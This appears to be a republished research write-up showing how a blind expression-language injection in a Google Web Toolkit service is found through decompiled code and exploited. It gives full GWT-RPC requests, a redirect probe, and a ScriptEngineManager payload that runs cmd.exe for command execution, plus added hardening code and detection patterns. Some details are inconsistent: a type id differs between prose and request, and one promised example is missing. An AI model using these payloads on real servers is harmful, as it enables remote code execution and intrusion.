
How to Getshell in Google Web Toolkit environment

2025-01-16 Update From: SLTechnology News&Howtos

Shulou (Shulou.com) 06/01 Report

This article explains how to get a shell in a Google Web Toolkit environment. The content is simple and clear and easy to follow; please read along with the editor's train of thought.

Google Web Toolkit (GWT) is an open source Java software development framework. This article shows how injecting expression language (EL) statements into such an environment can produce a high-risk vulnerability.

The vulnerability

In WEB-INF/web.xml, I found the following servlet mapping for a web endpoint:

```xml
<servlet>
  <servlet-name>SomeService</servlet-name>
  <servlet-class>com.aaa.bbb.ccc.ddd.server.SomeServiceImpl</servlet-class>
</servlet>
<servlet-mapping>
  <servlet-name>someService</servlet-name>
  <url-pattern>/someService.gwtsvc</url-pattern>
</servlet-mapping>
```

The mapping above references the server-side implementation. GWT defines a client-side interface that declares which remote calls the client is allowed to make. Let's look at that interface in the client package com.aaa.bbb.ccc.ddd.client:

```java
public abstract interface SomeService extends RemoteService {
    public abstract void sendBeanName(String paramString);
    public abstract Boolean setMibNodesInfo(List paramList);
    public abstract void createMibNodeGettingBean();
}
```

The interface exposes three methods, so let's take them one at a time and see what each does. In the ServiceImpl class we find the following implementation of the first:

```java
public void sendBeanName(String paramString) {
    if (paramString == null) {
        return;
    }
    HttpSession localHttpSession = super.getThreadLocalRequest().getSession();
    if (localHttpSession != null) {
        localHttpSession.setAttribute("MibWidgetBeanName", paramString);
    }
}
```

This method stores whatever string we send in the session attribute "MibWidgetBeanName". On its own there is nothing to exploit here, so let's move on to setMibNodesInfo:

```java
public Boolean setMibNodesInfo(List paramList) {
    List localList = ModelUtil.mibNodeModelList2MibNodeList(paramList);
    if (localList != null) {
        MibNodesSelect localMibNodesSelect = getBeanByName();
        // ... the remainder of the method is not shown in the original listing
    }
    // ...
}
```

This method expects a list of MIBNodeModel objects. The mibNodeModelList2MibNodeList helper checks whether the list we pass in conforms to the expected shape and returns different values depending on one element of the list.

If the list is empty, the helper creates a new list filled with the MIBNodeModel default values. Either way getBeanByName is then called, so let's look at that method.

```java
private MibNodesSelect getBeanByName() {
    // ... (FacesContext setup elided in the original listing)
    Object localObject1 = super.getThreadLocalRequest().getSession();
    if (localObject1 != null) {
        localObject2 = (String) ((HttpSession) localObject1).getAttribute("MibWidgetBeanName");
        if (localObject2 != null) {
            localObject3 = null;
            try {
                localObject3 = (MibNodesSelect) FacesUtils.getValueExpressionObject(
                        localFacesContext, "#{" + (String) localObject2 + "}");
            } finally {
                if ((localFacesContext != null) && (i != 0)) {
                    localFacesContext.release();
                }
            }
            return (MibNodesSelect) localObject3;
        }
    }
    return null;
}
```

Because this is a private method, it is not visible from the client interface. Where it calls getAttribute("MibWidgetBeanName") (line 8 of the decompiled listing) we can see the same session attribute being read back into localObject2.

That value is then concatenated into "#{...}" (line 14 of the decompiled listing) and evaluated as an EL expression. This is a classic expression injection vulnerability, but one that only becomes visible once the code has been decompiled.
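As an added example (not code from the article or from the product it describes), the vulnerable lookup pattern beside a hardened version: the session value is never spliced into an EL string; it is checked against a strict identifier pattern and an allowlist, then resolved as a bean name through the ELResolver. The class and allowed bean names are assumed.

```java
import java.util.Set;
import java.util.regex.Pattern;
import javax.el.ELContext;
import javax.faces.context.FacesContext;

public class MibBeanLookup {

    // Vulnerable pattern, as in the decompiled getBeanByName(): a value the client put into
    // the session is spliced into an EL expression string and evaluated as code.
    static Object lookupUnsafe(FacesContext ctx, String beanName) {
        String expr = "#{" + beanName + "}"; // beanName may carry arbitrary EL
        return ctx.getApplication().evaluateExpressionGet(ctx, expr, Object.class);
    }

    // Hardened: accept only a plain identifier that is also on an allowlist of bean names
    // (the names here are assumed for the example) and resolve it as a name, never as an expression.
    private static final Pattern IDENTIFIER = Pattern.compile("[A-Za-z_][A-Za-z0-9_]{0,63}");
    private static final Set<String> ALLOWED_BEANS = Set.of("mibNodesSelect", "mibWidgetBean");

    static boolean isAllowedBeanName(String beanName) {
        return beanName != null
                && IDENTIFIER.matcher(beanName).matches()
                && ALLOWED_BEANS.contains(beanName);
    }

    static Object lookupSafe(FacesContext ctx, String beanName) {
        if (!isAllowedBeanName(beanName)) {
            return null; // reject; the caller already handles a null bean
        }
        ELContext el = ctx.getELContext();
        // base == null asks the resolver chain for a top-level name (managed bean or scoped
        // variable); no expression parser runs on this path, so "#{...}" cannot be injected.
        return el.getELResolver().getValue(el, null, beanName);
    }
}
```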

Attack process

First of all, this is not an EL injection with a return value: you cannot tell from the response whether the expression you supplied was executed. I therefore treat it as a blind EL injection.

To illustrate with a simple example: if one of our JSF (JavaServer Faces) applications had such a vulnerability, the vulnerable code would look similar to the following:

It could then be triggered with a request like the following:

```
http://[target]/some_endpoint/vuln.jsf?expression=9%2b1
```

Because the browser turns a literal "+" into a space, we URL-encode the "+" sign; if the result comes back as 10, we know the server evaluated "9+1". Using arithmetic expressions to detect injection is the same technique Burp Suite uses.

In the code we audited, however, there is no return value, so can we still easily tell whether an EL injection exists? Not that way, but there are other options. Looking through the JSF documentation, I found some useful functions that make it possible to confirm EL injection without issuing an extra HTTP request from the payload.

The official Oracle documentation states that the FacesContext object exposes a getExternalContext method. It returns an ExternalContext, which lets us set properties of the current response. While reading the documentation, two of its methods caught my attention:

setResponseCharacterEncoding
redirect

So we can set the session string to the following expression:

```
facesContext.getExternalContext().redirect("http://srcincite.io/")
```

If the response status value is 302 and is redirected to "http://srcincite.io/", then we can determine that a vulnerability exists.

Vulnerability testing

Our first request assigns the MibWidgetBeanName attribute:

```
POST /someService.gwtsvc HTTP/1.1
Host: [target]
Accept: */*
X-GWT-Module-Base:
X-GWT-Permutation:
Cookie: JSESSIONID=[cookie]
Content-Type: text/x-gwt-rpc; charset=UTF-8
Content-Length: 195

6|0|6|45D7850B2B5DB917E4D184D52329B5D9|com.aaa.bbb.ccc.ddd.client.SomeService|sendBeanName|java.lang.String|facesContext.getExternalContext().redirect("http://srcincite.io/")|1|2|3|4|1|5|6|
```

The response "//OK[[],0,6]" tells us GWT accepted the call. The second request then triggers the string stored in the session. Before sending it, though, we need to know what setMibNodesInfo will accept: because it takes a complex type, we have to check the serialization policy file to see which types may be submitted. In the [strongname].gwt.rpc file I found the type allowed for the list: java.util.ArrayList/382197682.

Now we can send our request data.

```
POST /someService.gwtsvc HTTP/1.1
Host: [target]
Accept: */*
X-GWT-Module-Base:
X-GWT-Permutation:
Cookie: JSESSIONID=[cookie]
Content-Type: text/x-gwt-rpc; charset=UTF-8
Content-Length: 171

6|0|6|45D7850B2B5DB917E4D184D52329B5D9|com.aaa.bbb.ccc.ddd.client.SomeService|setMibNodesInfo|java.util.List|java.util.ArrayList/3821976829|1|2|4|1|5|6|0|
```

If the expression is evaluated, the response looks similar to the following:

```
HTTP/1.1 302 Found
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=[cookie]; Path=/; Secure; HttpOnly
Set-Cookie: oam.Flash.RENDERMAP.TOKEN=-g9lc30a8l; Path=/; Secure
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Location: http://srcincite.io/
Content-Type: text/html;charset=UTF-8
Content-Length: 45
Date: Wed, 03 May 2017 18:58:36 GMT
Connection: close

//OK
```

The redirect confirms that the expression was executed. What we actually want, though, is a shell. The article at http://blog.mindedsecurity.com/2015/11/reliable-os-shell-with-el-expression.html shows that ScriptEngineManager can be used from EL to execute Java code. Its payload is very long, so I used the same approach to write a shorter one myself:

```
"".getClass().forName("javax.script.ScriptEngineManager").newInstance().getEngineByName("JavaScript").eval("var proc=new java.lang.ProcessBuilder[\"(java.lang.String[])\"]([\"cmd.exe\",\"/c\",\"calc.exe\"]).start();")
```

Update the MibWidgetBeanName attribute with this string, then call setMibNodesInfo again to trigger it and obtain command execution on the system:

```
POST /someService.gwtsvc HTTP/1.1
Host: [target]
Accept: */*
X-GWT-Module-Base:
X-GWT-Permutation:
Cookie: JSESSIONID=[cookie]
Content-Type: text/x-gwt-rpc; charset=UTF-8
Content-Length: 366

6|0|6|45D7850B2B5DB917E4D184D52329B5D9|com.aaa.bbb.ccc.ddd.client.SomeService|sendBeanName|java.lang.String|"".getClass().forName("javax.script.ScriptEngineManager").newInstance().getEngineByName("JavaScript").eval("var proc=new java.lang.ProcessBuilder[\"(java.lang.String[])\"]([\"cmd.exe\",\"/c\",\"calc.exe\"]).start();")|1|2|3|4|1|5|6|
```

Trigger the EL expression:

```
POST /someService.gwtsvc HTTP/1.1
Host: [target]
Accept: */*
X-GWT-Module-Base:
X-GWT-Permutation:
Cookie: JSESSIONID=[cookie]
Content-Type: text/x-gwt-rpc; charset=UTF-8
Content-Length: 171

6|0|6|45D7850B2B5DB917E4D184D52329B5D9|com.aaa.bbb.ccc.ddd.client.SomeService|setMibNodesInfo|java.util.List|java.util.ArrayList/3821976829|1|2|4|1|5|6|0|
```
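From the detection side, an added example that is not part of the article: the GWT-RPC body carried by the requests above is a pipe-delimited record whose third field is the size of the string table that follows, so a log review or WAF rule can extract the string table and flag entries containing EL delimiters, reflection or script-engine calls, none of which appear in a legitimate bean name. The sample bodies are constructed; the module base, strong name and interface are placeholders.

```java
import java.util.ArrayList;
import java.util.List;
import java.util.regex.Pattern;

public class GwtRpcElScanner {

    // Markers that have no business in a bean name: EL delimiters, reflection and scripting hooks.
    private static final Pattern SUSPICIOUS = Pattern.compile(
            "[#$]\\{|\\.getClass\\s*\\(|ScriptEngineManager|getExternalContext\\s*\\(|ProcessBuilder");

    /** Returns the string table of a GWT-RPC body laid out as version|flags|count|s1|...|sN|indices... */
    static List<String> stringTable(String body) {
        String[] fields = body.split("\\|", -1);
        List<String> table = new ArrayList<>();
        if (fields.length < 3) return table;
        int count;
        try {
            count = Integer.parseInt(fields[2].trim());
        } catch (NumberFormatException e) {
            return table; // not a GWT-RPC record
        }
        for (int i = 3; i < 3 + count && i < fields.length; i++) table.add(fields[i]);
        return table;
    }

    /** Returns the string-table entries that look like EL or scripting payloads. */
    static List<String> suspiciousEntries(String body) {
        List<String> hits = new ArrayList<>();
        for (String s : stringTable(body)) {
            if (SUSPICIOUS.matcher(s).find()) hits.add(s);
        }
        return hits;
    }

    public static void main(String[] args) {
        // Constructed samples in the layout the article shows; STRONGNAME and the URLs are placeholders.
        String benign = "6|0|6|http://example.invalid/app/|STRONGNAME|com.example.client.SomeService"
                + "|sendBeanName|java.lang.String|mibWidgetBean|1|2|3|4|1|5|6|";
        String hostile = "6|0|6|http://example.invalid/app/|STRONGNAME|com.example.client.SomeService"
                + "|sendBeanName|java.lang.String|facesContext.getExternalContext().redirect(\"http://example.invalid/\")"
                + "|1|2|3|4|1|5|6|";
        System.out.println("benign hits:  " + suspiciousEntries(benign));
        System.out.println("hostile hits: " + suspiciousEntries(hostile));
    }
}
```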

Conclusion

It is almost impossible to find this vulnerability in black-box penetration testing. Tools like Burp Suite will not find it, especially since the injected string is stored in the session and only triggered by a separate call.

As network technology advances we rely more and more on automation, and finding this class of bug takes more knowledge, skill and tooling than automated scanning provides.
